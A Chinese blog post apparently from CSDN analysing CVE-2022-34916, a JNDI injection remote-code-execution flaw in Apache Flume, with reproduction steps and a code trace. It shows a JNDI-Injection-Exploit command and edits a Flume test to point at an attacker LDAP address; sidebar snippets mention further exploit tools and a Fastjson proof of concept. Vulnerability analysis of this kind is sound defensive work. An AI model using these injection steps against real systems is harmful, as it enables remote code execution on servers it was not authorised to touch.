开源漏洞深度分析|CVE-2022-34916 JNDI命令执行漏洞

最新推荐文章于 2024-08-08 07:21:51 发布
最新推荐文章于 2024-08-08 07:21:51 发布
阅读量1.4k 收藏 1
点赞数 1
分类专栏: 漏洞深度分析 文章标签: 开源 java 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/LJQClqjc/article/details/126668219
版权

项目介绍

Flume 是一种分布式、可靠且可用的服务,用于高效收集、聚合和移动大量日志数据。它具有基于流数据流的简单灵活的架构。它具有可调整的可靠性机制以及许多故障转移和恢复机制,具有健壮性和容错性。它使用允许在线分析应用程序的简单可扩展数据模型。

项目地址

Welcome to Apache Flume — Apache Flume

漏洞概述

当攻击者控制目标 LDAP 服务器时,如果配置使用带有 JNDI LDAP 数据源 URI 的 JMS 源,Apache Flume 版本 1.4.0 到 1.10.0 很容易受到远程代码执行 (RCE) 攻击。通过将 JNDI 限制为仅允许使用 java 协议或不使用协议来解决此问题。[1]

影响版本

Apache Flume 1.4.0-1.10.0

环境搭建

下载部署即可

Index of /dist/flume/1.10.0

漏洞复现

该漏洞需要使用 JNDI工具辅助复现,可使用 JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar 工具。

工具链接:

https://github.com/welk1n/JNDI-Injection-Exploit

命令如下所示:

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "open -a calculator"

终端开启监听,搭建 Flume 项目以 jdk1.8 环境运行 TestIntegrationActiveMQ 测试类即可

漏洞分析

查看 commit 能发现新增的校验为了拦截进 else 的 initialContext.lookup(destinationName);这就是这个漏洞的Sink点。

 

查看该 if-else ,判断 destinationLocator 等于 JMSDestinationLocator.CDI,上溯检查类参数

JMSMessageConsumer(......
                   String destinationName, JMSDestinationLocator 
destinationLocator
                   ......

TestJMSMessageConsumer#testCreateDurableSubscription 初始化了 JMSMessageConsumer 并传入 destinationLocator

destinationLocator 的定义如下所示,为了进入 JMSMessageConsumer 的 else 循环,需要修改该变量为 JNDI

destinationLocator = JMSDestinationLocator.CDI;

//改为 jndi 即可
destinationLocator = JMSDestinationLocator.JNDI;

destinationName 由 DESTINATION_NAME 定义,需要改为工具开启的 ldap链接,JNDI_PREFIX 改为 ldap://

//private static final String DESTINATION_NAME = "test"; 
private static final String DESTINATION_NAME = "x.x.x.x:1389/iq9wuv"; 
//public static final String JNDI_PREFIX = "dynamicQueues/"; 
public static final String JNDI_PREFIX = "ldap://";

该项目需要使用官方提供的Test类作为 source点传入参数,Test类中只有 TestIntegrationActiveMQ 类存在 testQueueLocatedWithJndi ,CFG如下所示:

按漏洞复现步骤进行复现测试即可

 

修复方式

升级到更高版本

参考链接

[1] CVE -CVE-2022-34916
[2] [FLUME-3428] Need better parameter validation in JMSMessageConsumer - ASF JIRA
[3] https://github.com/apache/flume/commit/7fe9af49c485756e1b618493a5bc00b70d7fbd2d
[4] https://lists.apache.org/thread/qkmt4r2t9tbrxrdbjg1m2oczbvczd9zn

棱镜七彩
关注
专栏目录
CVE-2022-34916 Apache Flume 远程代码执行漏洞分析
小王的储物间
01-31 417
1、网络安全理论知识(2天)①了解行业相关背景,前景,确定发展方向。②学习网络安全相关法律法规。③网络安全运营的概念。④等保简介、等保规定、流程和规范。(非常重要)2、渗透测试基础(一周)①渗透测试的流程、分类、标准②信息收集技术:主动/被动信息搜集、Nmap工具、Google Hacking③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察④主机攻防演练:MS17-010、MS08-067、MS10-046、MS12-20等3、操作系统基础(一周)
命令注入_JNDI注入远程命令执行
weixin_34897593的博客
01-08 3832
在2016年的BlackHat上,@pwntester分享了通过JNDI注入进行RCE利用的方法。JNDI注入利用方式比较简单。我们先看一下poc代码。首先在攻击机上部署恶意代码exp.class。exp.class放在http://127.0.0.1:8001/目录下,所以攻击机需要开启http服务和rmi服务。import java.io.IOException;import jav...
JNDI-Injection-Exploit 使用教程
最新发布
gitblog_01056的博客
08-08 634
JNDI-Injection-Exploit 使用教程 JNDI-Injection-ExploitJNDI注入测试工具(A tool which generates JNDI links can start several servers to exploit JNDI Injection vulnerability,like Jackson,Fastjson,etc)项目地址:https:/...
X凌OA系统任意文件读取&SSRF+JNDI远程命令执行组合
thelostworld
05-14 1168
X凌OA系统任意文件读取-SSRF+JNDI远程命令执行一、漏洞描述深圳市蓝凌软件股份有限公司数字OA(EKP)存在任意文件读取漏洞。攻击者可利用漏洞获取敏感信息,同时利用ssrf可远程命令执行。二、漏洞影响蓝凌OA三、利用 蓝凌OA custom.jsp 任意文件读取漏洞 读取配置文件读取路径:/WEB-INF/KmssConfig/admin.properties读取文件:POC:POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1 Host: 127
Apache Flume 远程代码执行漏洞CVE-2022-25167)
murphysec的博客
06-14 2160
CVE-2022-25167漏洞是由于Apache Flume 的 JMSSource 类对配置的 JNDI LDAP 数据源中路径没有进行验证,导致不受信任的数据被反序列化。该漏洞影响范围小,漏洞等级中。影响版本为1.4.0到 1.9.0,官方已发布更新,建议用户更新到最新版本。参考链接: https://issues.apache.org/jira/browse/FLUME-3416 https://nvd.nist.gov/vuln/detail/CVE-2022-25167 https://secl
Java代码审计——apache log4j 远程命令执行CVE-2021-44228)
王嘟嘟的博客
12-13 1901
0x00 前言 反序列化总纲 本来是快乐游戏时间的,但是突然就出来这个洞了= =,当然这个突然用的比较夸张了,修复时间应该是在五天前了。 本着学习的态度来进行一下简单的分析。 0x01 环境 首先是pom <dependencies> <dependency> <groupId>org.apache.logging.log4j</groupId> <artifactId>lo
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC
08-10
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC CVE-2022-33891 影响版本 Apache spark version 3.1.1版本 Apache Spark version>= 3.3.0 修复方案 1.建议升级到安全版本,参考官网链接: ...
XStream拒绝服务漏洞(CVE-2022-41966)响应通告
05-05
XStream拒绝服务漏洞(CVE-2022-41966)响应通告
麒麟Linux kernel本地权限提升漏洞(CVE-2022-0847)漏洞补丁及相关依赖包9
03-15
麒麟Linux kernel本地权限提升漏洞(CVE-2022-0847)漏洞补丁及相关依赖包9 麒麟Linux kernel本地权限提升漏洞(CVE-2022-0847)漏洞补丁及相关依赖包9 麒麟Linux kernel本地权限提升漏洞(CVE-2022-0847)漏洞补丁及相关...
SpringCloud Function SpEL注入漏洞分析CVE-2022-22963).doc
07-08
SpringCloud Function SpEL 注入漏洞分析CVE-2022-22963) SpringCloud Function 是 Spring 提供的一套分布式函数式编程组件,旨在帮助开发者专注于业务逻辑实现,而不需要关心服务器环境运维等问题。然而,在 ...
JNDIExploit-1.4-SNAPSHOT.jar
01-10
编译后的JNDIExploit-1.4-SNAPSHOT.jar,可以直接用,1.4版本支持tomcatBypass路由直接上线msf。
JNDI-Injection-Exploit:JNDI注入测试工具(生成JNDI链接的工具可以启动多个服务器来利用JNDI Injection漏洞,例如Jackson,Fastjson等)
05-07
JNDI注入漏洞 描述 JNDI-Injection-Exploit是用于生成可用的JNDI链接并通过启动RMI服务器,LDAP服务器和HTTP服务器来提供后台服务的工具。 RMI服务器和LDAP服务器基于并进行了进一步修改以与HTTP服务器链接。 使用此工具可以获取JNDI链接,可以将这些链接插入POC以测试漏洞。 例如,这是一个Fastjson vul-poc: { " @type " : " com.sun.rowset.JdbcRowSetImpl " , " dataSourceName " : " rmi://127.0.0.1:1099/Object " , " autoCommit " : true } 我们可以用JNDI-Injection-Exploit生成的链接替换“ rmi://127.0.0.1:1099 / Object”,以测试漏洞。 免责声明 所有信
jndi-1.2.1.jar.zip
03-20
ndi1..2.1所需要的jar,1,。2.1
JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar
05-27
整合rmi和ldap服务器+恶意类,使用方法: $ java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar [-C] [command] [-A] [address] where: -C - command executed in the remote classfile. (optional , default command is "open /Applications/Calculator.app") -A - the address of your server, maybe an IP address or a domain. (optional , default address is the first network interface address)
5-java安全基础——RMI和JNDI实现漏洞利用
网络安全
07-14 3645
JNDIJava Naming and Directory Interface,Java命名和目录接口)是一组在Java应用中访问命名和目录服务的接口,jndi可以实现给当前服务器的所有资源定义一个唯一的访问标识(例如数据库,网页,文件,连接池等等),方便开发者通过指定的标识来访问对象(目标资源文件,数据库等等)。 关于什么是标识符?可参考RMI注册表,例如在RMI中通过rmi://10.100.0.1:10086/userRmiServices来映射RMI注册表中的userRmiServices远
CVE-2022-26135 Atlassian Jira Mobile Plugin SSRF漏洞分析
小王的储物间
01-31 418
其中batchService接口的实现类BatchServiceImpl位于com.atlassian.jira.plugin.mobile.service.impl.BatchServiceImpl.class。插件,在com.atlassian.jira.plugin.mobile.rest.v1_0.BatchResource中存在barch。继续跟进,位于com.atlassian.jira.plugin.mobile.util.LinkBuilder.class。
JNDI 注入漏洞的前世今生
有价值炮灰
12-14 3680
前两天的 log4j 漏洞引起了安全圈的震动,虽然是二进制选手,但为了融入大家的过年氛围,还是决定打破舒适圈来研究一下 JNDI 注入漏洞JNDI 101 首先第一个问题,什么是 JNDI,它的作用是什么? 根据官方文档,JNDI 全称为 Java Naming and Directory Interface,即 Java 名称与目录接口。虽然有点抽象,但我们至少知道它是一个接口;下一个问题是,Naming 和 Directory 是什么意思?很多相关资料都对其语焉不详,但其实官方对其有详细解释。 N
JNDI-Injection-Exploit
做你想做的人,没有时间的限制,只要愿意,什么时候都可以start。
12-12 3832
JNDI-Injection-Exploit工具比marshalsec要好用的多,相当于把http服务器和协议服务器放在了一起 github地址 https://github.com/welk1n/JNDI-Injection-Exploit.git 可以下载其release下的安装包 $ java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar [-C] [command] [-A] [address] 其中: -C - 远程class文件中要执行命令
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值